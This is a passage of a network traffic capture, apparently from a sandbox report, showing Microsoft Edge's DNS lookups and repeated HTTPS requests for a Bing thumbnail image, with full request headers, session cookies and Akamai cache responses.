Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
DNS

200.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.197.79.204.in-addr.arpa

IN PTR

Response

200.197.79.204.in-addr.arpa

IN PTR

a-0001a-msedgenet
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=92&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=92&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=899596
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-187.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.bb777b5c.1728144351.37a8e3b
X-Check-Cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=97&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=97&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=917406
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-187.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.bb777b5c.1728144351.37a8e3f
X-Check-Cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=90&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=90&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=841907
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-185.deploy.akamaitechnologies.com (AkamaiGHost/11.6.4-e26983a004e229b4ffa935b6e3b2fe8f) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.b9777b5c.1728144351.6649083
X-Check-Cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=96&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=96&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&EXLTT=1

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=926124
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-185.deploy.akamaitechnologies.com (AkamaiGHost/11.6.4-e26983a004e229b4ffa935b6e3b2fe8f) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.b9777b5c.1728144351.6649092
X-Check-Cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=91&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=91&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144349&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=931846
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-181.deploy.akamaitechnologies.com (AkamaiGHost/11.6.4-e26983a004e229b4ffa935b6e3b2fe8f) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.b5777b5c.1728144351.1eb45977
X-Check-Cacheable: YES
GET

https://th.bing.com/th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=98&pcl=fffffa&r=0&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.162:443

Request

GET /th?id=ODLS.A2450BEC-5595-40BA-9F13-D9EC6AB74B9F&w=32&h=32&qlt=98&pcl=fffffa&r=0&o=6&pid=1.2 HTTP/1.1
Host: th.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144350&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Type: image/png
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 616
Cache-Control: public, max-age=889854
Date: Sat, 05 Oct 2024 16:05:51 GMT
X-Cache: TCP_MEM_HIT from a92-123-119-181.deploy.akamaitechnologies.com (AkamaiGHost/11.6.4-e26983a004e229b4ffa935b6e3b2fe8f) (-)
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.b5777b5c.1728144351.1eb45995
X-Check-Cacheable: YES
GET

